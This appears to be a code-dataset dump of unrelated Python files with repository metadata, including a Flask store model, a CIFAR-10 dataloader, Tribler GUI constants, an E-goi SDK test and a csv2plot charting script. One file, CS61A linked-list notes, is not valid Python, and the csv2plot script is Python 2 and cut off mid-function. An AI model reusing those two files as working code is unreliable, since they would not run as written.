466bfa3db237894b693ce15d8c0569041d91c0d5 | 667b7d744fff4d38933ae24077f3782adb6fd622 | /app/configs/migration.py | 8615445c2574bef2dec22f522074ae0d8583d3df | [] | no_license | CarlosMartorini/leads-crud | be549d084d3737749857f186d6650862102106b7 | 2a1f04b2db6c3f6723e5b098a83d22ff2409515e | refs/heads/master | 2023-08-11T20:08:10.629215 | 2021-09-26T21:34:16 | 2021-09-26T21:34:16 | 410,668,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from flask import Flask
from flask_migrate import Migrate
def init_app(app: Flask):
from app.models.leads_model import Lead
Migrate(app, app.db) | [
"c7.silveira@gmail.com"
] | c7.silveira@gmail.com |
506f4f48d4a2d524e97a96b35887b2d6e92d429a | c6257bc16d47a585082dd9cb06894603037eae57 | /8.1-20.py | 85a480d57a6b090f219c894760aab1c1e96155a7 | [] | no_license | Letian-Wang/CS61A-Structure-and-Interpretation-of-Computer-Programs | 973ea917ad1f7dced92a1e140b0fb6db7ae04a30 | fd04be9f33c18f855e3cede46320b7cd0a811ee7 | refs/heads/master | 2022-10-24T05:26:45.411133 | 2020-06-14T08:08:48 | 2020-06-14T08:08:48 | 270,806,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 694 | py | ''' Linked list '''
Link(3, Link(4, Link(5, Link.empty)))
class Link:
empty = ()
def __init__(self, first, rest = empty):
assert rest is Link.empty or isinstance(rest, Link)
self.first = first
self.rest = rest
s = Link(3, Link(4, Link(5)))
s.first
s.rest.first
s.rest.rest.first
s.rest.rest.rest is Link.empty
s.rest.first = 7
Link(3, Link(7, Link(5)))
Link(8, s.rest)
''' Property methods '''
@property decorator
class Link:
@property
def second(self):
return self.rest.first
@second.setter
def second(self, value):
self.rest.first = value
''' Tree Class '''
Recursion description
Relative description
class Tree:
def
| [
"wangletian1995@126.com"
] | wangletian1995@126.com |
2288382d79d71af3c464745eab55071cec85c730 | 6f48b588ca15865325f23ea41cc86b5a04148928 | /dataloader.py | 087e2198a8a2f473b1bf6dd3121ed250f78feaa3 | [] | no_license | yihanzheng/DL2017-lab-03-master | 467833e374c6e74b49d3271c99325d857fe2a9a8 | 6521a7d96fc18fc7bdeba4b69a1e78a0dbc44879 | refs/heads/master | 2021-05-06T05:16:23.754041 | 2017-12-24T01:17:06 | 2017-12-24T01:17:06 | 115,071,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,605 | py | import torch
import torchvision
import torchvision.transforms as transforms
#load the training and testing data and transform data
class DataLoader(object):
def __init__(self, data_path, batch_size, n_threads):
self.data_path = data_path
self.batch_size = batch_size
self.n_threads = n_threads
#data transform rule
transform_train = transforms.Compose(
[transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])
transform_test = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])
#take the training and testing data(root,train/test,download,transforms rule)
trainset = torchvision.datasets.CIFAR10(root = self.data_path,train = True,
download = True, transform = transform_train)
testset = torchvision.datasets.CIFAR10(root = self.data_path,train = False,
download = True, transform = transform_test)
#load the data(data,batch_size,shuffle,threads of data loading)
self.train_loader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size,
shuffle = True, num_workers = self.n_threads)
self.test_loader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size,
shuffle = False, num_workers = self.n_threads)
self.classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def getloader(self):
return self.train_loader, self.test_loader | [
"yihanzheng7@gmail.com"
] | yihanzheng7@gmail.com |
e27f61c97808942556f956f9422de14a5bd4a641 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/5/lFp.py | af044a654924c11751ea171e241dc87980eeaa4e | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'lFP':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
e078062f848f5fc1dd6c86f01b9d7e5b571cc9fe | 57329656e867c6b349852fb7772ec113e9aeaff0 | /models/store.py | 5bbfbdae2a4a4116331c1f1fb579ce490e894cd4 | [
"Apache-2.0"
] | permissive | aliyamullina/flask-restful-api | 9fe92f63a2c475c2a757474fcf6fb128725822ce | fc3b5cfd43144cecdf697fa03de55a3f0bce3932 | refs/heads/main | 2023-08-06T05:08:28.068170 | 2021-09-25T19:30:13 | 2021-09-25T19:30:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | from db import db
class StoreModel(db.Model):
__tablename__ = "stores"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80))
items = db.relationship("ItemModel", lazy="dynamic")
def __init__(self, name):
self.name = name
def json(self):
return {
"name": self.name,
"items": [item.json() for item in self.items.all()],
"uuid": self.find_by_name(self.name).id,
}
@classmethod
def find_by_name(cls, name):
return cls.query.filter_by(name=name).first()
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
db.session.delete(self)
db.session.commit()
| [
"berpress@gmail.com"
] | berpress@gmail.com |
87e9d19acc4b8071aec31cefba7589ce4fdd00e9 | f299c76607c643dea8ef06df118fec04d7976651 | /puller/pipeline.py | 19035665e9f9dbbd8f616d791e0b728b0580b2b3 | [] | no_license | warvariuc/trains | d90b410926c003b3fc6a9d327254677bf8754997 | 8e78cbca11f6da7f7067426bb659862628d44805 | refs/heads/master | 2021-01-19T13:33:14.049347 | 2014-03-24T12:24:42 | 2014-03-24T12:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | __author__ = 'Victor Varvariuc <victor.varvariuc@gmail.com>'
from .item import Item
from .spider import Spider
class ItemPipeline():
"""Base item pipeline.
"""
def on_spider_started(self, spider):
pass
def on_spider_finished(self, spider):
pass
def process_item(self, item, spider):
assert isinstance(item, Item)
assert isinstance(spider, Spider)
| [
"victor.varvariuc@gmail.com"
] | victor.varvariuc@gmail.com |
af2e4f1e4afdc10bff273aa9782e170c9b8a8c5c | 919df3ff896881ad8620984cbca59067f6212ad0 | /regym/tests/networks/policy_inference_actor_critic_test.py | 87bc7be4501df883fe3c9ed59ca3d342c14868d7 | [
"MIT"
] | permissive | Danielhp95/Regym | d84241347712d0984a7127d4841f7b2021fa72c0 | 64e02e143070ca6eb8bc8f898c431f59cd229341 | refs/heads/master | 2022-01-15T08:32:03.545858 | 2022-01-03T20:17:00 | 2022-01-03T20:17:00 | 162,127,100 | 12 | 5 | MIT | 2020-03-24T11:35:17 | 2018-12-17T12:26:31 | Python | UTF-8 | Python | false | false | 2,538 | py | import numpy as np
import torch
import torch.nn as nn
from tqdm import tqdm
from regym.networks.bodies import FCBody
from regym.networks.generic_losses import cross_entropy_loss
from regym.networks.heads import PolicyInferenceActorCriticNet
def test_can_learn_two_different_policies():
num_policies = 2
num_actions = 3
target_policy_1 = torch.FloatTensor([[1., 0., 0.]])
target_policy_2 = torch.FloatTensor([[1/3, 1/3, 1/3]])
feature_extractor = FCBody(state_dim=3, hidden_units=[3], gate=nn.functional.leaky_relu)
policy_inference_body = FCBody(state_dim=3, hidden_units=[3], gate=nn.functional.leaky_relu)
actor_critic_body = FCBody(state_dim=3, hidden_units=[3], gate=nn.functional.leaky_relu)
model = PolicyInferenceActorCriticNet(
num_policies=num_policies,
num_actions=num_actions,
feature_extractor=feature_extractor,
policy_inference_body=policy_inference_body,
actor_critic_body=actor_critic_body)
train_model(model, target_policy_1, target_policy_2)
_test_model(model, target_policy_1, target_policy_2)
def train_model(model, target_policy_1, target_policy_2):
optimizer = torch.optim.Adam(model.parameters(), lr=5e-4)
training_steps = 1500
progress_bar = tqdm(range(training_steps))
for i in progress_bar:
input_tensor = torch.rand(size=(1, 3))
prediction = model(input_tensor)
from torch.nn.functional import kl_div
cross_entropy_loss_1 = cross_entropy_loss(model_prediction=prediction['policy_0'], target=target_policy_1.unsqueeze(0))
cross_entropy_loss_2 = cross_entropy_loss(model_prediction=prediction['policy_1'], target=target_policy_2.unsqueeze(0))
total_loss = cross_entropy_loss_1 + cross_entropy_loss_2
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
progress_bar.set_description(
'L1: {}\tL2: {}'.format(
cross_entropy_loss_1, cross_entropy_loss_2))
def _test_model(model, target_policy_1, target_policy_2):
test_steps = 100
for _ in range(test_steps):
input_tensor = torch.rand(size=(1, 3))
prediction = model(input_tensor)
pred_1 = prediction['policy_0'].detach().numpy()
pred_2 = prediction['policy_1'].detach().numpy()
np.testing.assert_array_almost_equal(pred_1, target_policy_1.numpy(), decimal=1)
np.testing.assert_array_almost_equal(pred_2, target_policy_2.numpy(), decimal=1)
| [
"danielhp95@gmail.com"
] | danielhp95@gmail.com |
c3438cfc2e58585f56186596756b732197d47003 | ad0ece878bf7dfd2368a5bb2093acc37a1fece66 | /bt5/erp5_officejs_appstore_base/SkinTemplateItem/portal_skins/erp5_officejs_appstore_base/SoftwareProduct_updateApplication.py | 05e6320255a275bd0183d890d255365a9b3436a3 | [] | no_license | kingkazmam/erp5 | 3842cb0353906d211edaef6597ba8d7d1dc48570 | ec40f658a8fcdbb672c359e30bfa96b35c05ee03 | refs/heads/master | 2020-04-02T13:21:40.813593 | 2018-10-22T05:41:27 | 2018-10-24T08:12:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | return context.ERP5Site_createNewSoftwarePublication(
file=file,
product_line="software/application",
title=context.getTitle(),
version_title= str(DateTime()),
changelog=changelog,
description="",
software_product=context.getRelativeUrl(),
**kw
)
| [
"vincent.bechu@nexedi.com"
] | vincent.bechu@nexedi.com |
8c85e7bc65aa6b0897b818780e5d9dbab7ac662d | 2f26a1772d3a298ca24fa219cdd9986e236df10a | /TriblerGUI/defs.py | 7a640f879a0bc6ee54f7ac86e441e44ad57606ac | [] | no_license | devos50/TriblerGUI | 4715e16ad1ca82b8971c71ec01ec43856c80cc7d | 92defabcc496d21e7ba8844cf6d21b296559ee98 | refs/heads/master | 2021-01-10T11:58:44.835055 | 2016-05-01T14:26:14 | 2016-05-01T14:26:14 | 52,109,082 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,066 | py | # Define stacked widget page indices
PAGE_HOME = 0
PAGE_MY_CHANNEL = 1
PAGE_SEARCH_RESULTS = 2
PAGE_CHANNEL_DETAILS = 3
PAGE_SETTINGS = 4
PAGE_VIDEO_PLAYER = 5
PAGE_SUBSCRIBED_CHANNELS = 6
PAGE_DOWNLOADS = 7
PAGE_CHANNEL_CONTENT = 0
PAGE_CHANNEL_COMMENTS = 1
PAGE_CHANNEL_ACTIVITY = 2
PAGE_MY_CHANNEL_OVERVIEW = 0
PAGE_MY_CHANNEL_SETTINGS = 1
PAGE_MY_CHANNEL_TORRENTS = 2
PAGE_MY_CHANNEL_PLAYLISTS = 3
PAGE_MY_CHANNEL_RSS_FEEDS = 4
PAGE_SETTINGS_GENERAL = 0
PAGE_SETTINGS_CONNECTION = 1
PAGE_SETTINGS_BANDWIDTH = 2
PAGE_SETTINGS_SEEDING = 3
PAGE_SETTINGS_ANONYMITY = 4
# Definition of the download statuses and the corresponding strings
DLSTATUS_ALLOCATING_DISKSPACE = 0
DLSTATUS_WAITING4HASHCHECK = 1
DLSTATUS_HASHCHECKING = 2
DLSTATUS_DOWNLOADING = 3
DLSTATUS_SEEDING = 4
DLSTATUS_STOPPED = 5
DLSTATUS_STOPPED_ON_ERROR = 6
DLSTATUS_METADATA = 7
DLSTATUS_CIRCUITS = 8
DLSTATUS_STRINGS = ["Allocating disk space", "Waiting for check", "Checking", "Downloading", "Seeding", "Stopped",
"Stopped on error", "Waiting for metadata", "Building circuits"]
# Definitions of the download filters. For each filter, it is specified which download statuses can be displayed.
DOWNLOADS_FILTER_ALL = 0
DOWNLOADS_FILTER_DOWNLOADING = 1
DOWNLOADS_FILTER_COMPLETED = 2
DOWNLOADS_FILTER_ACTIVE = 3
DOWNLOADS_FILTER_INACTIVE = 4
DOWNLOADS_FILTER_DEFINITION = {
DOWNLOADS_FILTER_ALL: [DLSTATUS_ALLOCATING_DISKSPACE, DLSTATUS_WAITING4HASHCHECK, DLSTATUS_HASHCHECKING,
DLSTATUS_DOWNLOADING, DLSTATUS_SEEDING, DLSTATUS_STOPPED, DLSTATUS_STOPPED_ON_ERROR,
DLSTATUS_METADATA, DLSTATUS_CIRCUITS],
DOWNLOADS_FILTER_DOWNLOADING: [DLSTATUS_DOWNLOADING],
DOWNLOADS_FILTER_COMPLETED: [DLSTATUS_SEEDING],
DOWNLOADS_FILTER_ACTIVE: [DLSTATUS_ALLOCATING_DISKSPACE, DLSTATUS_WAITING4HASHCHECK, DLSTATUS_HASHCHECKING,
DLSTATUS_DOWNLOADING, DLSTATUS_SEEDING, DLSTATUS_METADATA, DLSTATUS_CIRCUITS],
DOWNLOADS_FILTER_INACTIVE: [DLSTATUS_STOPPED, DLSTATUS_STOPPED_ON_ERROR]
}
| [
"martijn@code-up.nl"
] | martijn@code-up.nl |
f6533124b5415fa799a1d77d1c4ef0d8c14ec654 | 77b0067191267176cf868b0261133d13429aeb70 | /avaliacoes/admin.py | 5ed4192425dc1edfe2f634c00b6c1799626a7a02 | [] | no_license | marcossouz/django-rest-framework | 92cd945d8e96e815f88c985a2b0a8bc1107d235e | 70fd911b99ef511a3d77ab58dfeeea50b913e11c | refs/heads/master | 2023-04-28T18:00:09.414938 | 2022-04-24T15:36:48 | 2022-04-24T15:36:48 | 202,238,713 | 2 | 0 | null | 2023-04-21T20:35:46 | 2019-08-13T23:39:12 | Python | UTF-8 | Python | false | false | 95 | py | from django.contrib import admin
from .models import Avaliacao
admin.site.register(Avaliacao) | [
"mrcsz.m@gmail.com"
] | mrcsz.m@gmail.com |
bc7e6918b6630b409153c0d84d6feefc8425c2b6 | fd67592b2338105e0cd0b3503552d188b814ad95 | /test/test_models/test_ping.py | 61773ff5dfcc00185b57a32a4230151250581dbc | [] | no_license | E-goi/sdk-python | 175575fcd50bd5ad426b33c78bdeb08d979485b7 | 5cba50a46e1d288b5038d18be12af119211e5b9f | refs/heads/master | 2023-04-29T20:36:02.314712 | 2023-04-18T07:42:46 | 2023-04-18T07:42:46 | 232,095,340 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,002 | py | # coding: utf-8
"""
APIv3 (New)
# Introduction This is our new version of API. We invite you to start using it and give us your feedback # Getting Started E-goi can be integrated with many environments and programming languages via our REST API. We've created a developer focused portal to give your organization a clear and quick overview of how to integrate with E-goi. The developer portal focuses on scenarios for integration and flow of events. We recommend familiarizing yourself with all of the content in the developer portal, before start using our rest API. The E-goi APIv3 is served over HTTPS. To ensure data privacy, unencrypted HTTP is not supported. Request data is passed to the API by POSTing JSON objects to the API endpoints with the appropriate parameters. BaseURL = api.egoiapp.com # RESTful Services This API supports 5 HTTP methods: * <b>GET</b>: The HTTP GET method is used to **read** (or retrieve) a representation of a resource. * <b>POST</b>: The POST verb is most-often utilized to **create** new resources. * <b>PATCH</b>: PATCH is used for **modify** capabilities. The PATCH request only needs to contain the changes to the resource, not the complete resource * <b>PUT</b>: PUT is most-often utilized for **update** capabilities, PUT-ing to a known resource URI with the request body containing the newly-updated representation of the original resource. * <b>DELETE</b>: DELETE is pretty easy to understand. It is used to **delete** a resource identified by a URI. # Authentication We use a custom authentication method, you will need a apikey that you can find in your account settings. Below you will see a curl example to get your account information: #!/bin/bash curl -X GET 'https://api.egoiapp.com/my-account' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' Here you can see a curl Post example with authentication: #!/bin/bash curl -X POST 'http://api.egoiapp.com/tags' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' \\ -H 'Content-Type: application/json' \\ -d '{`name`:`Your custom tag`,`color`:`#FFFFFF`}' # SDK Get started quickly with E-goi with our integration tools. Our SDK is a modern open source library that makes it easy to integrate your application with E-goi services. * <a href='https://github.com/E-goi/sdk-java'>Java</a> * <a href='https://github.com/E-goi/sdk-php'>PHP</a> * <a href='https://github.com/E-goi/sdk-python'>Python</a> * <a href='https://github.com/E-goi/sdk-ruby'>Ruby</a> * <a href='https://github.com/E-goi/sdk-javascript'>Javascript</a> * <a href='https://github.com/E-goi/sdk-csharp'>C#</a> # Stream Limits Stream limits are security mesures we have to make sure our API have a fair use policy, for this reason, any request that creates or modifies data (**POST**, **PATCH** and **PUT**) is limited to a maximum of **20MB** of content length. If you arrive to this limit in one of your request, you'll receive a HTTP code **413 (Request Entity Too Large)** and the request will be ignored. To avoid this error in importation's requests, it's advised the request's division in batches that have each one less than 20MB. # Timeouts Timeouts set a maximum waiting time on a request's response. Our API, sets a default timeout for each request and when breached, you'll receive an HTTP **408 (Request Timeout)** error code. You should take into consideration that response times can vary widely based on the complexity of the request, amount of data being analyzed, and the load on the system and workspace at the time of the query. When dealing with such errors, you should first attempt to reduce the complexity and amount of data under analysis, and only then, if problems are still occurring ask for support. For all these reasons, the default timeout for each request is **10 Seconds** and any request that creates or modifies data (**POST**, **PATCH** and **PUT**) will have a timeout of **60 Seconds**. Specific timeouts may exist for specific requests, these can be found in the request's documentation. # Callbacks A callback is an asynchronous API request that originates from the API server and is sent to the client in response to a previous request sent by that client. The API will make a **POST** request to the address defined in the URL with the information regarding the event of interest and share data related to that event. <a href='/usecases/callbacks/' target='_blank'>[Go to callbacks documentation]</a> ***Note:*** Only http or https protocols are supported in the Url parameter. <security-definitions/> # noqa: E501
The version of the OpenAPI document: 3.0.0
Generated by: https://openapi-generator.tech
"""
import unittest
import egoi_api
from egoi_api.model.ping import Ping
from egoi_api import configuration
class TestPing(unittest.TestCase):
"""Ping unit test stubs"""
_configuration = configuration.Configuration()
if __name__ == '__main__':
unittest.main()
| [
"integrations@e-goi.com"
] | integrations@e-goi.com |
e4cb79168d0d6aef400b62c1a4c2050bdec9689c | d0ec423a9bf21957d51f9530e0761d74031c972c | /03_Fahrenheit_To_Celsius_testv2.py | 8f22fb31d149a6a8a94923db0d6b8e499cf87480 | [] | no_license | NathanM3/Temperature-Converter | e9207ca4834de1ab820b4caa26a2bb5899fc14b7 | 4a274bab5e9306e14058833559524b9258c9ccf4 | refs/heads/main | 2023-06-26T18:23:48.961984 | 2021-07-24T09:20:00 | 2021-07-24T09:20:00 | 377,973,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | """ Converting Fahrenheit to Celsius v2
Converting from degrees Fahrenheit to Celsius
Function takes in a value, does the conversion and puts answer into a list
Testing different ways of rounding that I can apply to both parts of comp 3
"""
def to_c(from_f):
celsius = (from_f - 32) * 5/9
# Method 1 of rounding numbers - checking if it has any decimals
if celsius % 1 == 0:
return int(celsius)
else:
return round(celsius, 1)
def to_c_round_v2(from_f):
celsius = (from_f - 32) * 5/9
# Method 2 of rounding numbers - sending them into a formatted string
if celsius % 1 == 0:
return "{:.0f}".format(celsius)
else:
return "{:.1f}".format(celsius)
# Main Routine
temperatures = [0, 32, 100]
converted = []
converted2= []
for temp in temperatures:
answer = to_c(temp)
answer2 = to_c_round_v2(temp)
ans_statement = "{} degrees F is {} degrees C".format(temp, answer)
ans_statement2 = "{} degrees F is {} degrees C".format(temp, answer2)
converted.append(ans_statement)
converted2.append(ans_statement2)
print(converted)
print(converted2)
| [
"morrisonn2@middleton.school.nz"
] | morrisonn2@middleton.school.nz |
8d9b4873c643e06fd464ef9641252d22cd83a016 | fb15cf74d78ed1511e4a0ec85fb397cb59ba655c | /RandomArtGenerator/pixels.py | 0a014d66ed18a5a448fc15e8c52dacdcdac078ab | [] | no_license | niturobert/RandomArtGenerator | 70a16761938b8aff5c9d170dac2f4a6e26b47b17 | 707455ddba2b5e81720c5bb009d71dd01ffa1524 | refs/heads/master | 2023-06-22T04:42:40.090647 | 2021-07-17T13:13:50 | 2021-07-17T13:13:50 | 386,941,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | """
Semplice algoritmo di scrittura.
"""
from PIL import Image, ImageDraw
from random import randint
from config import *
SQUARE_SIZE = 8
with Image.new('RGB', (IMAGE_WIDTH, IMAGE_HEIGHT)) as image:
draw = ImageDraw.Draw(image)
for y in range(0, IMAGE_HEIGHT, SQUARE_SIZE):
for x in range(0, IMAGE_WIDTH, SQUARE_SIZE):
draw.rectangle([(x, y), (x + SQUARE_SIZE, y + SQUARE_SIZE)], fill=(randint(0, 255), randint(0, 255), randint(0, 255)))
image.show() | [
"nitu.robert.georgian@gmail.com"
] | nitu.robert.georgian@gmail.com |
8969006cf82f736e5a60bd8c29710cd5a996c994 | c8f5d69d21ac4df40d79a811dea2e3ad82fb5e04 | /src/csv2plot.py | a731eff829805f1ba98f1ab6013855d44df4bc50 | [] | no_license | webclinic017/usstock | e71ab18534fd3afc05ab2452578821584750e2b9 | c724f00bc1c5d2a41ee58e037ba0b1b3f0904f70 | refs/heads/master | 2023-08-15T05:22:14.275202 | 2021-10-14T21:19:53 | 2021-10-14T21:19:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,608 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Description: plot time series from a csv file
Usage of:
csv2plot.py file --sep=DELIMITER
Example:
# FROM data file
python csv2plot.py csv2plot.dat
# OR (near realtime data)
iex_types_batch.py --types=chart --range=1d --no_database_save AAPL | csv2plot.py - --columns=close,epochs --xaxis=epochs --title=Apple
# OR (daily data)
iex_types_batch.py --types=chart --range=3m --no_database_save AAPL | csv2plot.py - --columns=open,close,pbdate --xaxis=pbdate --title=Apple
# OR (daily return since inception )
iex_types_batch.py --types=chart --range=3m --no_database_save AAPL | csv2plot.py - --columns=open,close,pbdate --xaxis=pbdate --title=Apple --return_since_inception
# OR (pivot data)
printf "select m.label as ticker,p.close as price,p.pbdate from prc_hist p,mapping_series_label m where p.name in ('^GSPC','^TWII','000001.SS','^SOX','^DJI') and p.pbdate>20170101 and p.name=m.series order by m.label,p.pbdate" | psql.sh -d ara | grep -v rows | python2 csv2plot.py --pivot_group=ticker --pivot_value=price --title='Market Overview 2018-05-25' --interpolate --return_since_inception -
# OR (pivot data and near realtime per minute)
iex_types_batch.py --types=chart --range=1d --no_database_save AAPL XLK SPY| csv2plot.py - --columns=ticker,close,epochs --xaxis=epochs --pivot_group=ticker --pivot_value=close --title='Market Closing Overview' --interpolate --return_since_inception --trendline
# OR (pivot data with minute data)
python csv2plot.py AAPL_XLK_SPY.dat --columns=ticker,close,epochs --xaxis=epochs --pivot_group=ticker --pivot_value=close --title='Market Closing Overview' --interpolate --return_since_inception --trendline
# OR (stock data with --src)
csv2plot.py IBM --src=iex --columns=close,open,pbdate --days=90
# OR (fred data with --src)
csv2plot.py DGS2 --src=fred --columns=close,pbdate
# OR (stock data with --src and candlestick graph)
csv2plot.py IBM --src=iex --columns=close,open,high,low,volume,pbdate --title="IBM OHLC" --days=90 --ohlc
# OR (minute data and candlestick graph)
iex_types_batch.py --types=chart --range=1d --no_database_save --output=csv AAPL| csv2plot.py - --columns=close,open,high,low,volume,epochs,ticker --ohlc --title="Intraday AAPL OHLC" --xaxis=epochs --trendline
# OR (minute data and candlestick Combo graph)
iex_types_batch.py --types=chart --range=1d --no_database_save --output=csv AAPL| csv2plot.py - --columns=ticker,close,open,high,low,volume,epochs --ohlc_combo --title="Intraday AAPL" --xaxis=epochs --trendline
Note: return_since_inception will use $1 as the initial investment if the initial is less than $1
Last mod., Sat Oct 27 20:50:18 EDT 2018
"""
import sys
from optparse import OptionParser
from datetime import datetime
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.image as mimage
import matplotlib.ticker as mticker
import pandas as pd
from scipy.interpolate import interp1d
#font_name = "AR PL UKai CN"
#matplotlib.rcParams['font.family'] = font_name
#matplotlib.rcParams['axes.unicode_minus']=False # in case minus sign is shown as box
import matplotlib.font_manager as mfm
#font_path = "/usr/share/fonts/truetype/arphic/ukai.ttc"
font_path = "/usr/share/fonts/truetype/arphic/uming.ttc"
#font_path = "/usr/share/fonts/truetype/droid/DroidSansFallbackFull.ttf" #Droid Sans Fallback
prop = mfm.FontProperties(fname=font_path)
#prop = mfm.FontProperties()
plt.style.use('dark_background')
if sys.version_info.major == 2:
reload(sys)
sys.setdefaultencoding('utf8')
from cStringIO import StringIO
else:
from io import StringIO
#----------------------------------------------------------------#
def subDict(myDict,kyLst,reverseTF=False):
if reverseTF is True: # invert-match, select non-matching [kyLst] keys
return { ky:myDict[ky] for ky in myDict.keys() if ky not in kyLst }
else:
return { ky:myDict[ky] for ky in myDict.keys() if ky in kyLst }
def ymd_parser(x,fmt='%Y%m%d'): return datetime.strptime(str(x),fmt)
def epoch_parser(x,s=1000): return datetime.fromtimestamp(int(x/s))
def extrapolate_series(yo):
yg=yo.dropna()
fn = interp1d(map(int,yg.index.values), yg.values, fill_value='extrapolate')
return fn(map(int,yo.index.values))
def get_csvdata(args,sep='|',src=None,days=730,start=None,end=None,columns=None,hdrLst=None):
"""
Get data in datafram with selected [columns]
"""
if isinstance(args,pd.DataFrame):
df = args
if columns is not None and df.size > 0:
df = df[ list(set(df.columns) & set(columns.split(','))) ]
if hdrLst is not None:
xLst,yLst = hdrLst.split('=')
xyD = dict(zip(xLst.split(','),yLst.split(',')))
df.rename(columns=xyD,inplace=True)
return df
if len(args)<1:
return None
filename=args[0]
if filename=='-':
df=pd.read_csv(sys.stdin,sep=sep)
elif src is not None:
from _alan_calc import pull_stock_data
df = pull_stock_data(filename,days=days,src=src,start=start,end=end)
else:
df = pd.read_csv(filename,sep=sep)
if df.size < 1:
print >> sys.stderr, "**ERROR: Data not found!"
return {}
if columns is not None:
df = df[ list(set(df.columns) & set(columns.split(','))) ]
df.dropna(inplace=True)
if hdrLst is not None:
xLst,yLst = hdrLst.split('=')
xyD = dict(zip(xLst.split(','),yLst.split(',')))
df.rename(columns=xyD,inplace=True)
return df
def dataj2ts(ts,df,opts=None):
from _alan_str import jj_fmt
import ast
dd = subDict(opts,['j2ts'],reverseTF=True)
if df.size>0 and ts is not None and len(ts)>1:
dd=update(f=df)
return jj_fmt(ts,dd)
else:
return ''
def run_csv2plot(args,opts=None,optx=None):
"""
plot time series data from csv file
"""
#- Set input parameters
if opts is None:
opts, _ = opt_csv2plot([])
if optx is not None:
opts.update(optx)
for ky,va in opts.items():
exec("{}=va".format(ky))
#- Get data in datafram with selected [columns]
df = get_csvdata(args,sep=sep,src=src,days=days,start=start,end=end,columns=columns,hdrLst=hdrLst)
if df is None or len(df)<1 or df.size<1:
return None
if debugTF is True:
print >> sys.stderr, df.head()
#- Use backend to 'tkAgg' for cronjob
if pngname is None or len(pngname)<=4:
plt.switch_backend(backend)
#- Create datetime index
idxname='date'
pbname=xaxis
if pbname in df.columns:
from _alan_date import ymd_parser,epoch_parser
sdate = str(df[pbname].iloc[0])
if sdate.isdigit() == True:
if int(sdate)>123456789:
idxpt=[epoch_parser(x) for x in df[pbname]]
else:
idxpt=[ymd_parser(x,fmt="%Y%m%d") for x in df[pbname]]
else:
idxpt=[ymd_parser(x,fmt=x_fmt) for x in df[pbname]]
df.set_index(pd.DatetimeIndex(idxpt),inplace=True)
df.index.rename(idxname,inplace=True)
df = df.drop(pbname,1)
elif idxname in df.columns:
df[idxname] = pd.to_datetime(df[idxname])
df.set_index(idxname,inplace=True)
else:
df = df.reset_index(drop=True)
#- Create a pivot table
trendName = None
if pivot_group in df.columns and pivot_value in df.columns:
trendName = df[pivot_group][0]
df=df.pivot_table(index='date',columns=pivot_group,values=pivot_value)
#- Create linear-interpolation for missing data
if interpolateYN is True:
df=df.apply(extrapolate_series,axis=0)
#- Create return since inception
if rsiYN is True:
de=[]
for j in range(df.shape[1]):
inix = df.iloc[0,j] if df.iloc[0,j]>1 else 1
de.append(df.iloc[:,j]/inix*100.-100)
#de = [df.iloc[:,j]/df.iloc[0,j]*100.-100 for j in range(df.shape[1])]
df = pd.concat(de,axis=1)
#- Create trend curve
if trendTF is True:
try:
from _alan_pppscf import vertex_locator
if trendName is None:
trendName = df._get_numeric_data().columns[0]
dg, dh = vertex_locator(df[trendName],npar=npar,debugTF=True)
#df['trend'] = dg['trend'].values
if debugTF is True:
print >> sys.stderr, "Trendline dg:\n",dg
except Exception, e:
print >> sys.stderr, "**ERROR: {} @ {}".format(str(e),'vertex_locator()')
if title is None:
title="/".join(df.columns).upper()
if rsiYN is True:
title += " Return Since Inception"
#- plot simple line plot
if tsTF is False:
df = df.reset_index(drop=True)
if debugTF is True:
print >> sys.stderr, df.head()
print >> sys.stderr, df.tail()
nobs=len(df.index)
nsp = (nobs/nbins) if nobs>nbins*2 else nobs
#ds=[y for j,y in enumerate(df.index) if j%nsp==0]
#ax=df.plot(xticks=ds,title=title)
colorUD = ['red','green'] if lang=='cn' else ['green','red']
if ohlcComboTF is True:
from alan_plot import plot_candlestickCombo
from _alan_calc import run_tech
